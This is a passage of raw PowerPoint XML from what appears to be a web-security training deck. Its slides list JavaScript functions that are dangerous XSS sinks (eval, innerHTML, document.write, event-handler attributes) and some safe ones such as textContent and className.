          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="542827685"/>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Dangerous JavaScript functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1526946"/>
            <a:ext cx="2630029" cy="1169549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Direct Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185759" y="1526944"/>
            <a:ext cx="5958242" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="9144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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>window.execScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()/function()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>requestAnimationFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>script.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2795035"/>
            <a:ext cx="2630028" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build HTML/JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185758" y="2795036"/>
            <a:ext cx="5958242" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="4572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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.writeln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = danger, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.outerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = danger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("dangerous attribute", danger) – attributes like: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onblur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="4200548"/>
            <a:ext cx="2630028" cy="1093685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Within Execution Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185758" y="4217016"/>
            <a:ext cx="5958243" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="4572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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onblur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6997754" y="298517"/>
            <a:ext cx="1465134" cy="1484240"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Oval 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59647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570"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some safe JavaScript sinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1157616"/>
            <a:ext cx="2630029" cy="1898994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setting a Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185647" y="1147862"/>
            <a:ext cx="5958241" cy="1985159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="4572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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.textContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>elem.className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>dangerVariable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
